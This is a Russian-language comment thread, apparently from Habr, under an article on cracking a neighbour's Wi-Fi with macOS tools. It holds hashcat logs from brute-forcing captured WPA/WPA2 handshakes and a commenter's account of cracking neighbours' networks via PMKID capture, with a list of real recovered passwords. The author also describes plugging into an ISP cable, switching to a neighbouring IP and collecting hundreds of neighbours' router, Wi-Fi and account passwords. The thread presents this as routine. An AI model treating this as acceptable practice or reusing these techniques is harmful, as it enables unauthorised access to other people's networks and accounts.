Next dictionary / mask in queue selected. Bypassing current one.
Session..........: hashcat
Status...........: Bypass
Hash.Type........: WPA/WPA2
Hash.Target......: /home/mintx/naive-hashcat/bettercap-wifi-handshakes.hccapx
Time.Started.....: Sat Jul 17 08:11:37 2021 (1 sec)
Time.Estimated...: Sat Jul 17 10:20:52 2021 (2 hours, 9 mins)
Guess.Mask.......: ?u?d?d [3]
Guess.Queue......: 65/837 (7.77%)
Speed.Dev.#1.....: 64467 H/s (6.72ms)
Recovered........: 156/165 (94.55%) Digests, 4/9 (44.44%) Salts
Progress.........: 61440/900000000 (0.01%)
Rejected.........: 0/61440 (0.00%)
Restore.Point....: 0/10000000 (0.00%)
Candidates.#1....: 123 -> 166
HWMon.Dev.#1.....: Temp: 74c Fan: 64%
Skipping mask '?d?d?l' because it is smaller than the minimum password length.
[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit => b
Потом пытается перебирать неподходящей маской:
Session..........: hashcat
Status...........: Running
Hash.Type........: WPA/WPA2
Hash.Target......: /home/alex/naive-hashcat/bettercap-wifi-handshakes.hccapx
Time.Started.....: Sat Jul 17 03:30:16 2021 (1 hour, 7 mins)
Time.Estimated...: Sat Jul 17 07:50:00 2021 (3 hours, 12 mins)
Guess.Mask.......: ?u?u?u?u [4]
Guess.Queue......: 44/837 (5.26%)
Speed.Dev.#1.....: 32121 H/s (6.72ms)
Recovered........: 156/165 (94.55%) Digests, 4/9 (44.44%) Salts
Progress.........: 232611840/900000000 (25.85%)
Rejected.........: 0/232611840 (0.00%)
Restore.Point....: 2580480/10000000 (25.80%)
Candidates.#1....: 8285 -> 8617
HWMon.Dev.#1.....: Temp: 74c Fan: 64%
[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit => s
А так скрипт шикарный.
не знаю по какой причине я не могу лайкнуть ваш коммент, но спасибо ) дельное замечание. за эти годы я получил много фидбека от статьи но почти весь он: "у меня не работает хэшкэт!". и действительно, даже через месяц после публикации, он уже не собирался через brew без говна и палок.
с одной стороны жаль, что статья получилась настолько недолговечной. с другой стороны, задача же была не настроить хэшкэт, а объяснить суть на реальном примере ) а это, судя по фидбэку, вполне удалось
Лайкнуть можно до месяца после даты комментария. Статья вполне долговечная. На OSX для меня оказался самым удобным способом узнать, что большинство "соседей" используют пароль из 8 цифр и несколько - из словаря rockyou.txt. Чаще всего это была какая-то дата. Сильно подозреваю, что это делал провайдер и эта дата - дата подключения. Фактически мне оказалось удобным скомбинировать эту статью со статьей @zhovner https://habr.com/ru/post/482914/
От этой я использовал naive-hashcat (хоть и с багом - просто удалить маски менее 8 символов) - у меня старая видеокарта, которая не работает с версией, где баг исправлен. Более старую версию не пробовал).
А от "Похек Wi-Fi встроенными средствами macOS" я использовал Bettercap и большинство взломанных точек я поймал в PMKID. А посоветованный в статье Onlinehashcrack.com бесплатно отлавливает пароли из 8 цифр, экономя время.
Для наглядности добавлю некоторые пароли, открытые Onlinehashcrack.com:
wifi
88888888 hello1982 vladimir asdfghjk 75876241 39371195 password
ах этот @zhovner ) в какой-то момент лет 10 назад у нас был конфликт, но сейчас, я вижу и ценю его вклад в безопасность. а учитывая flipper, он вообще большой молодец.
в той статье, насколько помню, помимо классического сниффа канала ради хендшейков он приводил ещё и примеры с wps взломом, который часто эффективней. но моей задачей всё же было больше рассказать о том, что не нарушает закон, условно.
в последнее время провы стали умнее и ставят рандомный пасс на вафлю. раньше да, чаще это была дата договора или прямой номер, в случае мгтс, аббонента. однако, это не защищает от обхода по внутрянке, т.к. пасс от роутера часто даже до сих пор стандартный. где-то в соседней статье я рассказывал, как воткнул в ноут кабель от билайна на съемной квартире и не имея логина/пароля буквально за пару минут получил сотни их, в том числе пароли от вафель, аккаунтов и роутов соседей. и, повторю, всё тоже стандартными методами. там вообще всё сводилось к тому, что я просто втыкал кабель, менял ip адрес на соседний и без проблем подключался к сети
Добываем Wi-Fi соседа стандартными средствами MacOS